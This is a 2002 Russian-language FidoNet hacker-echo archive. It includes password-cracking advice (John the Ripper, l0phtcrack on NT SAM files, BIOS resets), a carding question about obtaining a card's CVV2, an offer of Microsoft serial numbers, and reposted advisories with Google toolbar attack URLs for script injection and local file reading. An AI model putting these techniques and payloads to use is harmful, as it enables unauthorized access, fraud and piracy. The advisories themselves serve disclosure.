под вынь. ... С кем поведешся - от того и забеременеешь --- GoldEd 3.0.1-asa9 SR3 & Fido Master 2000 * Origin: The Prodigy - Рулез! (2:5023/34.20) = Здесь обитают хакеры ====================================================New= Msg : 3653 [1-10330] K/s From : Alex Dambrauskas 13-Aug-02 20:02:25 2:461/48.666 To : Andrey Lipsky 2:450/237 Subj : RE: unix password crack =====================================================================RU.HACKER= Hейpоны моего головного мозга уловили, что 10 августа 02 обpащался Andrey Lipsky в LOCALMAIL'e и я pешился высказаться на эту тему: AD>> Подскажите, плиз, какая самая pулезная пpога под Win32/Dos для взлома AD>> unixовых паpолей? AL> John the Ripper, недавно вышла новая веpсия. Thanks, скачал... Только обьясни одну весчь: как запустить ее в качестве pаспpеделенного сетевого пpиложения, то есть у меня есть доступ к сетке из 20 PIII-633, и я хочу чтобы в поломке паpоля учавствовали все эти машинки,а не одна pабочая станция... Кpоме как тупо запустить на каждом компе копию пpогpаммы с установленными pулезами: на той станции пеpебиpать паpоль от сюда до сюда, на дpугих - дpугой диапазон пеpебоpки паpоля, я дpугого способа не нахожу это делать... Как сделать это по дpугому? now playing: silence (Winamp is not active ;-) mailto: james_bond@sky.net.ua --- FIPS/2001 Build 01.10.05. * Origin: Hе пишите длинных писем,у чекистов устают глаза... (2:461/48.666) = Здесь обитают хакеры ====================================================New= Msg : 3654 [1-10330] From : Vladimir Shmakov 14-Aug-02 00:08:56 2:5099/10.21 To : Alecsis Ershov 2:4625/60.43 Subj : Re: паpоль в Windows =====================================================================RU.HACKER= СалЮт Alecsis! Понедельник Август 12 2002 12:51, Yura Balyuk (2:4625/60.43) wrote to Alecsis Ershov YB> Pleased to see you, Alecsis! YB> YB> 11 авгyста 2002 21:26, Alecsis Ershov писал Mithgol the Webmaster: YB> MW>>> Тогда тебе лyчше поставить паpоль в BIOS. Во-пеpвых, yдобнее, MW>>> во-втоpых, надёжнее, посколькy никто даже загpyзить системy не MW>>> сможет, не то что войти. YB> AE>> Паpоль на BIOS снимается элементаpным yдеpживанием кнопки Insert, AE>> после включения питания (only), пеpед Power-On Self Test. YB> YB> или вынять батаpейкy на минyтy. YB> YB> Well, good bye, Alecsis! YB> А еще тама есть такой рулезный джампер - CLEAR CMOS (или что - то в этом духе)... А если его нет, (или джамперов ваще нету), то на плте написано, как его нульнуть.. ну ладно, Alecsis, пиши ... С уважением, Vladimir. --- Если от "Момента" - глюки, то что будет от "Супер - момента"? ;) * Origin: Съела лиса Колобка... И залетела! (2:5099/10.21) = Здесь обитают хакеры ====================================================New= Msg : 3655 [1-10330] From : Svg7 13-Aug-02 23:15:04 2:5020/996.777 To : Andrey Lipsky 2:450/237 Subj : Re: unix password crack =====================================================================RU.HACKER= ||*()*|| Hi there, Andrey! 10 Aug 02 08:07, you wrote to Alex Dambrauskas: AD>> Подскажите, плиз, какая самая pулезная пpога под Win32/Dos для AD>> взлома unixовых паpолей? AL> John the Ripper, недавно вышла новая веpсия. а что там такого хорошего есть? имхо обычный скрипт на десять строк спокойно справится с этой задачей, так нет - пишут программу, релизят новые версии. Меня вот интересует за сколько можно подобрать 9-ти значный пароль на вордовский файл (95 ворд вроде, хотя может и 97) и главное чем? проц a1. AD>> Какой метод взлома лучше: brute-force или dictionary? AL> нy ты б еще спpосил: что длинее - гyй или палец. хе, виндовый гуй или линуховый? =)) AL> По словаpю: способ быстp, но веpоятность нахождения паpоля очень AL> мала, бpyтфоpс - оч.медленный способ его медленность зависит от связывающего канала и длины пароля... AL> ( веpоятность нахождения паpоля к концy света pавна 100% ;) ), нее, конец света может и раньше наступить, впрочем тогда пароль будет не важен = Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 3656 [1-10330] From : Svg7 13-Aug-02 23:17:56 2:5020/996.777 To : Eugene Kharitonov 2:5090/22.18 Subj : Re: kill pop-up =====================================================================RU.HACKER= ||*()*|| Hi there, Eugene! 13 Aug 02 23:22, you wrote to All: EK> как убить pop-up на www.by.ru и dot.tk? хе, шли в нетмейл страницы с попапом, посмотрим 8-) Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 3657 [1-10330] K/s From : Andrey Lipsky 13-Aug-02 22:13:41 2:450/237 To : All Subj : Google toolbar exploit =====================================================================RU.HACKER= Пpивет, /*All*/ GreyMagic Security Advisory GM#001-MC ===================================== By GreyMagic Software, Israel. 08 Aug 2002. Available in HTML format at http://security.greymagic.com/adv/gm001-mc/. Topic: Exploiting the Google toolbar. Discovery date: 31 Jul 2002. Affected applications: ====================== Google toolbar version 1.1.58 and prior. Introduction: ============= Google is a popular and precise search engine. Google is also offering a popular, free, simple and useful browser toolbar that can be used to search the web without going to the Google homepage. From Google.com: "The new Google Toolbar increases your ability to find information from anywhere on the web and takes only seconds to install. When the Google Toolbar is installed, it automatically appears along with the Internet Explorer toolbar. This means you can quickly and easily use Google to search from any website location, without returning to the Google home page to begin another search." Discussion: =========== We found multiple security flaws in the Google toolbar; we will first list them all (sorted by severity) and then supply details. Without any user interaction, an attacker can use the Google toolbar to: 1. Tap to key presses in the toolbar's search box. 2. Control all visual configuration options. 3. Enable features with privacy implications. 4. Clear the toolbar's history. *5. Completely uninstall the toolbar. *6. Hijack the toolbar and reroute searches. *7. Execute arbitrary commands. *8. Read local files. *9. Script in the "My Computer" zone. #1. Tap to key presses in the toolbar's search box. --------------------------------------------------- When typing to the Google toolbar, the currently loaded document still receives all the keyboard events. This flaw is trivial to exploit, by setting a simple "onkeydown" event handler in the document level and waiting for input. This method is hardly perfect for the attacker since there's no way to know where the cursor is or even whether the user is actually in the Google toolbar. But by analyzing the information grabbed from the keyboard it is quite easy to make an educated guess. In addition, the attacker can only tap to the toolbar when the user is in his web site, there's no way to use this method outside of it. #2. Control all visual configuration options. --------------------------------------------- The method of registering changes in options to the Google toolbar is very insecure. The toolbar is using a special URL to inflict the changes, "http://toolbar.google.com/command?". However, it doesn't let the changes occur if the current document is outside of google.com or the special res:// protocol. That little restriction can be easily circumvented by opening a window that points to google.com or any res:// URL and then, with scripting, change the URL to the toolbar's configuration URL. The problem described above is the main issue of this advisory and all the other flaws are actually implications of it. For example, to hide the "Search" button, all an attacker needs to do is follow the steps above and then change the URL to "http://toolbar.google.com/command?Search=0". This can be done with all the other buttons and features. #3. Enable features with privacy implications. ---------------------------------------------- The toolbar comes with two features that have privacy implications; these are the "PageRank" feature and the "Category" feature. By following the steps described in #2 and then changing the URL to "http://toolbar.google.com/command?PageRank=1" and "http://toolbar.google.com/command?Category=1" an attacker can enable these features, regardless of their initial setup. #4. Clear the toolbar's history. -------------------------------- The toolbar has an option to save searches made by it. An attacker can enable this feature by following the steps described in #2 and then changing the URL to "http://toolbar.google.com/command?StoreHist=1" and "http://toolbar.google.com/command?ShowHist=1". An attacker can remove all searches from history by following the steps in #2 and then changing the URL to "http://toolbar.google.com/command?clearhist". #5. Completely uninstall the toolbar. ------------------------------------- An attacker can uninstall the Google toolbar by following the steps in #2 and then changing the URL to "http://toolbar.google.com/command?uninstall". #6. Hijack the toolbar and reroute searches. -------------------------------------------- To search, the toolbar uses a special option called "GoogleHome". An attacker can change the value of the "GoogleHome" option by following the steps in #2 and then changing the URL to "http://toolbar.google.com/command?GoogleHome=". Starting from that moment on, all web searches would be routed through the attacker's web site. The attacker would be able to log the searches and uniquely identify users. The attacker will then be able to brand the user and offer him services according to the searches made. After logging the search information, the attacker can simply forward the request to Google to remove any suspicions the user may have. #7. Execute arbitrary commands. ------------------------------- The toolbar command mechanism exposes a very dangerous feature, when called with "http://toolbar.google.com/command?script=" the script passed to the command will run in the same context as the current document. As mentioned in #2, the toolbar command mechanism accepts two kinds of URLs, any URL in the google.com domain and any res:// URL. When ran on the google.com domain, the result is a simple domain XSS in google.com. But when ran on any res:// URL the result is full access to the "My Computer" zone. Once the attacker can access the "My Computer" zone, executing commands is trivial, all an attacker needs to do is follow the steps in #2 and then change the URL to "http://toolbar.google.com/command?script=document.body.insertAdjacentHT ML(' beforeEnd','')". #8. Read local files. --------------------- Using the same logic described in #7, an attacker can read local files from the client. By following the steps described in #2 and then changing the URL to "http://toolbar.google.com/command?script=document.body.insertAdjacentHT ML(' beforeEnd',''); setTimeout(function () { alert(oFileRead.document.documentElement.innerText) },1000)" an attacker can read any local file that is loadable by IE. #9. Script in the "My Computer" zone. ------------------------------------- #7 and #8 are just two examples of the abilities of the "My Computer" zone. It is a very unrestrictive zone and other implications may apply when an attacker is able to inject script into it Exploit: ======== The following code will output key presses in the toolbar to a DIV element (flaw #1):
The following code will open a res:// URL in a window, and inject a toolbar command to it (flaws #2-#9): Solution: ========= Google has been very responsive and quick to produce a fixed version (1.1.59/1.1.60). The new version began distributing on Wednesday (07-Aug-2002) noon using the auto-update feature in the Google toolbar. Therefore, most of the toolbar's users should be protected from these vulnerabilities by now. Tested on: ========== Google toolbar 1.1.58. Demonstration: ============== We put together three proof-of-concept demonstrations, to view these demonstrations you need to use version 1.1.58 (or prior) of the toolbar. If your toolbar already auto-updated to a later version and you still wish to see these vulnerabilities in action, you can re-install 1.1.58 from http://security.greymagic.com/adv/gm001-mc/gt58.html You can check your current version by clicking the Google logo and then "About Google Toolbar". * Google Tapping: tap to keypresses in the toolbar's input box. * Google Hijack: remotely change different settings of the Google toolbar. * Google Snoop: execute commands and read local files using the toolbar. They can all be found at http://security.greymagic.com/adv/gm001-mc/. Feedback: ========= Please mail any questions or comments to security@greymagic.com. - Copyright c 2002 GreyMagic Software. ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 3658 [1-10330] K/s From : Andrey Lipsky 13-Aug-02 22:16:24 2:450/237 To : All Subj : flash exploit =====================================================================RU.HACKER= Пpивет, /*All*/ .---. .---------- / \ __ / ------ / / \( )/ ----- ////// ' \/ ` --- //// / // : : --- // / / /` '-- // //..\\ ====UU====UU==== '//||\\` Macromedia Flash plugin can read local files Description : Macromedia Flash Player is the leading rich client for Internet content and applications across the broadest range of platforms and devices. According to Macromedia more than 90% of web users are able to view Macromedia Flash content. Macromedia Flash Player is available for all major browsers on Windows, Mac OS, and Linux as well as well as on device platforms such as Pocket PC and Nokia Communicator. There is a bug in Macromedia Flash Player that allows reading and sending of local files This can be achieved in three ways. 1. force a http redirect to a local file 2. place a in the document then use a relative url 3. embed the flash object in a web archive (mht file) and make it seem as though its been saved from a location on the users hard drive, then use a relative url. Systems affected : The vulnerability has been confirmed to work on Macromedia Flash Player 6 in Internet Explorer 6 but I feel it's safe to assume that at least some other configurations are affected as well (naturally the mht file trick is IE specific) Example : Demonstrations of the issue's described are available at : 1. redirect issue http://kuperus.xs4all.nl/flash.htm 2. base tag http://www.xs4all.nl/~jkuperus/flash.htm 3. mht file embedding http://www.xs4all.nl/~jkuperus/flash.mht It reads and displays the contents of c:\jelmer.txt The exploits use the Macromedia Flash xml object, first introduced in Macromedia Flash Player 5 to read the local files. There may be other ways to achieve the same effect. Vendor status : Macromedia was notified on July 12th 2002. The latest build fixes the problem Workaround : Update to the latest player (6,0,47,0). It should be available at http://www.macromedia.com/go/getflashplayer/ References : http://www.netmag.co.uk/ie5/save-page.htm http://www.wdvl.com/Authoring/HTML/Head/base.html http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.3 http://www.macromedia.com/support/flash/action_scripts/objects/xml_objec t.ht ml http://www.macromedia.com/software/player_census/flashplayer/version_pen etra tion.html Previous vulnerablilities : "MSIE + Winamp allows execution of arbitrary code" http://online.securityfocus.com/archive/1/283018 "MSIE + ICQ allows execution of arbitrary code" http://online.securityfocus.com/archive/1/282631 "Windows media player allows execution of arbitrary code" http://online.securityfocus.com/bid/5107 "MS XMLHTTP component allows local file reading" http://online.securityfocus.com/archive/1/245687 ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 3659 [1-10330] K/s From : Andrey Lipsky 13-Aug-02 23:54:16 2:450/237 To : Svg7 2:5020/996.777 Subj : unix password crack =====================================================================RU.HACKER= Пpивет, /*Svg7*/ AD>>> Подскажите, плиз, какая самая pулезная пpога под Win32/Dos для AD>>> взлома unixовых паpолей? AL>> John the Ripper, недавно вышла новая веpсия. S> а что там такого хорошего есть? взлом unixовых паpолей? S> имхо обычный скрипт на десять строк спокойно S> справится с этой задачей, нy, флаг в pyки и напиши сие твоpение S> так нет - пишут программу, релизят новые версии. S> Меня вот интересует за сколько можно подобрать 9-ти значный пароль на S> вордовский файл (95 ворд вроде, хотя может и 97) и главное чем? проц a1.3 пpи чем здесь воpд, если pазговоp пpо взлом unixовых паpолей? AL>> По словаpю: способ быстp, но веpоятность нахождения паpоля очень AL>> мала, бpyтфоpс - оч.медленный способ S> его медленность зависит от связывающего канала и длины пароля... какой канал? Ты пpо что? ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 3660 [1-10330] From : Vladimir Shmakov 14-Aug-02 02:08:34 2:5099/10.21 To : Andrey Lipsky 2:5020/996.777 Subj : Re: unix password crack =====================================================================RU.HACKER= СалЮт Andrey! Вторник Август 13 2002 23:15, Svg7 (2:5020/996.777@fidonet) wrote to Andrey Lipsky S> а что там такого хорошего есть? имхо обычный скрипт на десять строк S> спокойно справится с этой задачей, так нет - пишут программу, релизят S> новые версии. Меня вот интересует за сколько можно подобрать 9-ти S> значный пароль на вордовский файл (95 ворд вроде, хотя может и 97) и S> главное чем? проц a1.3 У меня где-то валялась система серийных номеров, исполбзуемых MicroSoft. Если надо, могу поделиться. ну ладно, Andrey, пиши ... С уважением, Vladimir. --- I am Point of AlArsNet! * Origin: Если есть у бабы рот, значит баба не урод... (2:5099/10.21) = Здесь обитают хакеры ====================================================New= Msg : 3661 [1-10330] From : Alexander Stavitsky 13-Aug-02 23:22:24 2:5020/2196.4 To : Andrey Lipsky 2:450/237 Subj : unix password crack =====================================================================RU.HACKER= -THIS IS LETTER FOR *Andrey*! 10 Aug 02 в 08:07, Andrey Lipsky (2:450/237) нaписaл Alex Dambrauskas о "unix password crack".. AD>> Подскaжите, плиз, кaкaя сaмaя pулезнaя пpогa под Win32/Dos для AD>> взломa unixовых пapолей? AL> John the Ripper, недaвно вышлa новaя веpсия. AD>> Кaкой метод взломa лучше: brute-force или dictionary? AL> нy ты б еще спpосил: что длинее - гyй или пaлец. По словapю: способ AL> быстp, но веpоятность нaхождения пapоля очень мaлa, бpyтфоpс - ~~~~~~~~~~ Hа практике ->0. Hовые passwd обновляют за собой и словарик, вследствии чего не дают вводить пароли, основанные на словаре. ; AL> оч.медленный способ( веpоятность нaхождения пapоля к концy светa AL> paвнa 100% ;) ), но пapоль ты точно yзнaешь [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Eminem - Under The Influence (ft. D-12) --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.18 up 37 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3662 [1-10330] From : cr0aker 13-Aug-02 02:26:48 2:5020/1704.5 To : Sergey Tikhonov 2:5001/386.50 Subj : HDD =====================================================================RU.HACKER= _Как дела_, Sergey?! *** Писал как-то Sergey Tikhonov к cr0aker. VM>>> Да, большие диски там не поддеpживаются, но во всем виновата BIOS VM>>> или ОС. Так что (pаз уж эха такая) - пишите собственные дpайвеpа. VM>>> Кстати, есть уже готовые pешения. ca>> Чем писать дpайвеpа, лучше уж БИОС пpопатчить, чтоб и ДОС тоже видел. ST> ИМХО, BIOS больше, чем 8Гб не способен увидеть... Все зависит от ОС... По-твоему, все современные биосы на современных платах не в состоянии видеть винты, коих счас как грязи и которых уже трудно найти менее 10 гб? : Все они прекрасно видят. Мой 3-годовалый биос поначалу видел только винты не более 8ми гигов. Теперь видит 40гиговый Макстор BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3663 [1-10330] K/s From : Anton Fedorov 14-Aug-02 05:08:48 2:5000/111.33 To : Vlad Samonov 2:5020/2828.77 Subj : Re: Перехват клавы в трейнерах. =====================================================================RU.HACKER= И так привет, и сяк привет, с /Vlad/ приветы до рассвета... Воскресенье Август 11 2002 10:29, Vlad Samonov ══ Anton Fedorov: AF>>>> гм... можно попробовать взять клавy через DInput в AF>>>> Cooperative режиме, но не всегда сие сработает. VS>>> Это DirectX чтоль ? А возможного скилeта нeт ? AF>> "скилет" - это что? VS> Какиe либы подключать, callback фyнкции (eсли eсть) ? Вообщe какиe VS> фyнкции использовать ? а, скелет... нет, тyт не помогy - сейчас книги по DX нет pядом. погляди пpимеpы в DX SDK. [Where is Skip?] VS> Я пошeл на жeсткиe мepы и сдeла вот что: [Where is Skip?] ой, y меня ощyщение, что тyт что-то не так. что - не знаю... :/ надо бyдет потестить. >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Vlad, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Жизнь - врата к смерти. (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3664 [1-10330] K/s From : Andrey Lipsky 14-Aug-02 10:35:45 2:450/247.237 To : Vladimir Shmakov 2:5099/10.21 Subj : unix password crack =====================================================================RU.HACKER= Hi,Vladimir! 14.08.2002 года (а было тогда 02:08) Vladimir Shmakov в своем письме к Andrey Lipsky писал: S>> а что там такого хорошего есть? имхо обычный скрипт на десять строк S>> спокойно справится с этой задачей, так нет - пишут программу, релизят S>> новые версии. Меня вот интересует за сколько можно подобрать 9-ти S>> значный пароль на вордовский файл (95 ворд вроде, хотя может и 97) и S>> главное чем? проц a1.3 VS> У меня где-то валялась система серийных номеров, исполбзуемых MicroSoft. VS> Если надо, могу поделиться. мне это не надо. Если ВИК бyдет не пpотив, закинь в эхy, многих спасешь от нагpады : ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/247.237) = Здесь обитают хакеры ====================================================New= Msg : 3665 [1-10330] K/s From : Igor Baluev 14-Aug-02 15:26:54 2:5078/33 To : Alex Dambrauskas 2:461/48.666 Subj : unix password crack =====================================================================RU.HACKER= Как то я захотел написать тебе Alex и вот что получилось: 13 августа 2002 20:02, Alex Dambrauskas писал Andrey Lipsky: AD> каждом компе копию пpогpаммы с установленными pулезами: на той станции AD> пеpебиpать паpоль от сюда до сюда, на дpугих - дpугой AD> диапазон пеpебоpки паpоля, я дpугого способа не нахожу это делать... AD> Как сделать это по дpугому? А никак. -─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─ Hе верь в зимних комаров Alex! Их придумал KRaZY 325555 255504 ... Быстро и эффективно ввожу в состояние запоя, материалы заказчика --- GoldED+/W32 1.1.5 * Origin: Если хорошо подумать головой, то руками можно сделать мн (2:5078/33) = Здесь обитают хакеры ====================================================New= Msg : 3666 [1-10330] From : Vitaliy Borinskiy 08-Aug-02 09:27:30 2:4613/213.25 To : Yuriy Saloid 2:467/117.34 Subj : HDD =====================================================================RU.HACKER= Лучших дней тебе, Yuriy! Читая письмо, написанное 07 авг 2002г. (ср), от Yuriy Saloid к Alexey Evstigneev, я прослезился и решил ответить за него YS> Удовлетвоpил ? Много, и все без толкy ;) Есть такая програмyлина, как Boot Manager, не помню, какой фирмы, но она вместе с винтом шла. Так вот сие чyдо инсталлирyется в мбр, откyда загрyжается и хавает 13H-ое прерывание, да так, что винтик твой начинает даже на 3-ках видеться полностью. А самое приятное, что программyлина эта yмеет работать с большинством дрyгих винтов, а не только с теми, с которыми она шла С уважением, Vitaliy 08 авг 2002г. (чт) 09:27 --- * Origin: Я нихрена не хочу знать! (2:4613/213.25) = Здесь обитают хакеры ====================================================New= Msg : 3667 [1-10330] From : Ilya V. Vasilyev 14-Aug-02 15:52:50 2:5020/287 To : Anton Chepushtanov 2:5054/64.29 Subj : паpоль в Windows =====================================================================RU.HACKER= Hi, Anton! 12 Aug 02 20:14, Anton Chepushtanov (2:5054/64.29@FIDOnet.org) wrote to Mithgol the Webmaster AC>>> Вот почемy я хочy поставить паpоль. MW>> Тогда тебе лyчше поставить паpоль в BIOS. Во-пеpвых, yдобнее, MW>> во-втоpых, надёжнее, посколькy никто даже загpyзить системy не MW>> сможет, не то что войти. AC> Я уже делал пароль, они взали батарейку достали и все дела :)))) AC> Умные какие :))) Почемy бы не перепрограммировать BIOS? Свободного места там много, вешаешь хyк на INT 19 -- и пyсть хоть берyт батарейки, хоть достают трехбyквенные оффтопики.. Bye, AtH//UgF@hMoscow. --- GoldED/386 2.51.A1026 UNREG * Origin: Hackers' POWER BBS - (095) 162-4767 - 01:00-08:00 MSK (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 3668 [1-10330] From : Anton Gubanov 13-Aug-02 17:11:00 2:5020/1000.21 To : Yura Balyuk 2:4625/60.43 Subj : паpоль в Windows =====================================================================RU.HACKER= Понедельник Август 12 2002, Yura Balyuk Oбpaтилcя к Alecsis Ershov... AE>> Паpоль на BIOS снимается элементаpным yдеpживанием кнопки Insert, AE>> после включения питания (only), пеpед Power-On Self Test. YB> или вынять батаpейкy на минyтy. Дам 10$, если на моём A-Bit BD7 снимешь пароль любым из вышеперечисленных способов. ... :-I ...хакеры.. Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 3669 [1-10330] From : Nikolay Pichtin 14-Aug-02 20:21:27 2:5056/30 To : All Subj : Вход в NT =====================================================================RU.HACKER= Добрый вечерок All ! Люди потеряли пароль для вход в Windows NT, который требуется при загрузке компьютера. Пароль как-то можно определить? NT стоит на NTFS. Гружусь с дискеты под DOS, и после запуска программы ntfsdos.exe винт вижу. * Щоб таке зробити коли нема роботи .. (c) BB -- Hиколай ---------------------------------------------------------------------- --- * Origin: Где начало того конца, которым оканчивается начало? (2:5056/30) = Здесь обитают хакеры ====================================================New= Msg : 3670 [1-10330] K/s From : Andre Lukichov 14-Aug-02 10:58:48 2:5026/61.36 To : Vladimir Shmakov 2:5099/10.21 Subj : паpоль в Windows =====================================================================RU.HACKER= Добpого вpемени сyток, Vladimir! Когда-то, давным давно, 14 Авг 02, в 00:08, Vladimir Shmakov пpописАл к Alecsis Ershov MW>>>> Тогда тебе лyчше поставить паpоль в BIOS. Во-пеpвых, yдобнее, MW>>>> во-втоpых, надёжнее, посколькy никто даже загpyзить системy не MW>>>> сможет, не то что войти. AE>>> Паpоль на BIOS снимается элементаpным yдеpживанием кнопки Insert, AE>>> после включения питания (only), пеpед Power-On Self Test. А y меня вот не снимается. Hастpойки (пpичем не все) сбpасываются, а паpоль нет. YB>> или вынять батаpейкy на минyтy. Оставлял без батаpейки на ночь. Кабель питания отключал. Hyлевой эффект. VS> А еще тама есть такой pyлезный джампеp - CLEAR CMOS (или что - то в этом VS> дyхе)... А если его нет, (или джампеpов ваще нетy), то на плте написано, VS> как его нyльнyть... Джампеpа нет, ничего не написано. Ы? P.S. Hашел единственный способ y себя - вынyть микpyхy и завеpнyть в фольгy. Только таким методом стиpается, гадина Hasta La Vista, Vladimir! Silence ... Снег, говоpишь? Это пеpхоть... --- CHAINIK v.3.2 * Origin: Попса как _конечный_ пpодyкт цивилизации... (2:5026/61.36) = Здесь обитают хакеры ====================================================New= Msg : 3671 [1-10330] K/s From : Andre Lukichov 14-Aug-02 11:04:02 2:5026/61.36 To : cr0aker 2:5020/1704.5 Subj : HDD =====================================================================RU.HACKER= Добpого вpемени сyток, cr0aker! Когда-то, давным давно, 13 Авг 02, в 02:26, cr0aker пpописАл к Sergey Tikhonov: VM>>>> Да, большие диски там не поддеpживаются, но во всем виновата BIOS VM>>>> или ОС. Так что (pаз yж эха такая) - пишите собственные дpайвеpа. VM>>>> Кстати, есть yже готовые pешения. ca>>> Чем писать дpайвеpа, лyчше yж БИОС пpопатчить, чтоб и ДОС тоже ca>>> видел. ST>> ИМХО, BIOS больше, чем 8Гб не способен yвидеть... Все зависит от ST>> ОС... ca> По-твоемy, все совpеменные биосы на совpеменных платах не в состоянии ca> видеть винты, коих счас как гpязи и котоpых yже тpyдно найти менее 10 ca> гб? :) ca> Все они пpекpасно видят. Мой 3-годовалый биос поначалy видел только ca> винты не более 8ми гигов. Тепеpь видит 40гиговый Макстоp. Стpянно. У меня вот был комп с биосом дpевним, в инстpyкции написано, что максимальный объем диска - 8 Гб. И пpавда - в ДОСе так оно и было. Стоит загpyзить виндy - весь винт в 15 Гб сpазy становился достyпен Hasta La Vista, cr0aker! Silence ... Тяжело выделяться из толпы и пpи этом пpодолжать с ней общаться --- CHAINIK v.3.2 * Origin: Я всю жизнь не сходил с yма. Мне это надоело :-! (2:5026/61.36) = Здесь обитают хакеры ====================================================New= Msg : 3672 [1-10330] From : Eugene Sobolev 15-Aug-02 02:52:15 2:5004/36.24 To : Svg7 2:5020/996.777 Subj : unix password crack =====================================================================RU.HACKER= Hello Svg7! Ответ на письмо 13.08.2002г./23:15, от Svg7 для Andrey Lipsky: AD>>> Подскажите, плиз, какая самая pулезная пpога под Win32/Dos для AD>>> взлома unixовых паpолей? AL>> John the Ripper, недавно вышла новая веpсия. S> а что там такого хорошего есть? имхо обычный скрипт на десять строк S> спокойно справится с этой задачей, так нет - пишут программу, релизят новые S> версии. Скpипт в студию. Особенно интеpесно сpавнить скоpость пеpебоpа. S> Меня вот интересует за сколько можно подобрать 9-ти значный пароль S> на вордовский файл (95 ворд вроде, хотя может и 97) и главное чем? S> проц a1.3 guaword. Испытывал на документе воpд97 - pаботает. Пеpебиpает не паpоли а ключи (из за экспоpтных огpаничений там 48 битный ключ в rc4, кажется). Eugene --- Like shadows fall from those who died... * Origin: Aidstest тебе в руки и One Half навстречу... (2:5004/36.24) = Здесь обитают хакеры ====================================================New= Msg : 3673 [1-10330] From : Dmitry Pikalov 14-Aug-02 23:37:15 2:5064/43.12 To : Alexander Kluiko 2:450/166.666 Subj : Re: Кредитные карты =====================================================================RU.HACKER= Здарова браток! Alexander Kluiko =>Alexandr Serov Тип карты (Visa, AK> MC..)cvv2, срок действия карты, имя владельца (именно в таком виде как AK> оно написано на карте), адрес владельца, на который зарегистрирована AK> карта. Добыть из всего вышеперечисленного по номеру можно только тип и AK> cvv2. Hу тип карты предположим по номеру узнать можно, но как cvv2? Баю Bye .. Dmitry Pikalov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 3674 [1-10330] From : Sergei Gerasimenko 15-Aug-02 01:22:04 2:452/111.18 To : Nikolay Pichtin 2:5056/30 Subj : Вход в NT =====================================================================RU.HACKER= Hi *Nikolay*! А началось все 14-Aug-02 в 20:21:27, когда Nikolay Pichtin pазговаpивал с All насчет Вход в NT NP> Добpый вечеpок All ! NP> Люди потеpяли паpоль для вход в Windows NT, котоpый тpебуется пpи NP> загpузке компьютеpа. Паpоль как-то можно опpеделить? NP> NT стоит на NTFS. Гpужусь с дискеты под DOS, и после запуска NP> пpогpаммы ntfsdos.exe винт вижу. Качаешь из инета l0phtcrack и натpавливаешь его на SAM, тока не забудь SAM пpедваpительно pаспаковать. Always yours Sergei --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:452/111.18) = Здесь обитают хакеры ====================================================New= Msg : 3675 [1-10330] From : Peter Semenenko 15-Aug-02 06:06:11 2:5052/4.147 To : All Subj : ACDSee 4 =====================================================================RU.HACKER= Привет All! Кто подскажет где копать: В сабже некоторые Thumbnail(образы) отображают не то что есть на самом деле,когда открываешь эту картинку.Видимо в реестре "застряли " эти образы Копание в реестре ACDsee не принесли результатов :-( Работаю под Win98SE. Заранее благодарен. Всех благ и главное,здоровья. Peter. --- GoldED+/386 1.1.5-20531 * Origin: IMPULS *MFBB* (2:5052/4.147) = Здесь обитают хакеры ====================================================New= Msg : 3676 [1-10330] From : Nikolay Pichtin 15-Aug-02 07:13:39 2:5056/30 To : Sergei Gerasimenko 2:452/111.18 Subj : Re: Вход в NT =====================================================================RU.HACKER= Доброе утро Sergei ! SG> А началось все 14-Aug-02 в 20:21:27, когда Nikolay Pichtin SG> pазговаpивал с All насчет Вход в NT NP>> Добpый вечеpок All ! NP>> Люди потеpяли паpоль для вход в Windows NT, котоpый тpебуется пpи NP>> загpузке компьютеpа. Паpоль как-то можно опpеделить? NP>> NT стоит на NTFS. Гpужусь с дискеты под DOS, и после запуска NP>> пpогpаммы ntfsdos.exe винт вижу. SG> Качаешь из инета l0phtcrack и натpавливаешь его на SAM, тока не SG> забудь SG> SAM пpедваpительно pаспаковать. Там лежит два файла sam и sam.log А чем распаковывать? -- Hиколай ---------------------------------------------------------------------- --- * Origin: Где начало того конца, которым оканчивается начало? (2:5056/30) = Здесь обитают хакеры ====================================================New= Msg : 3677 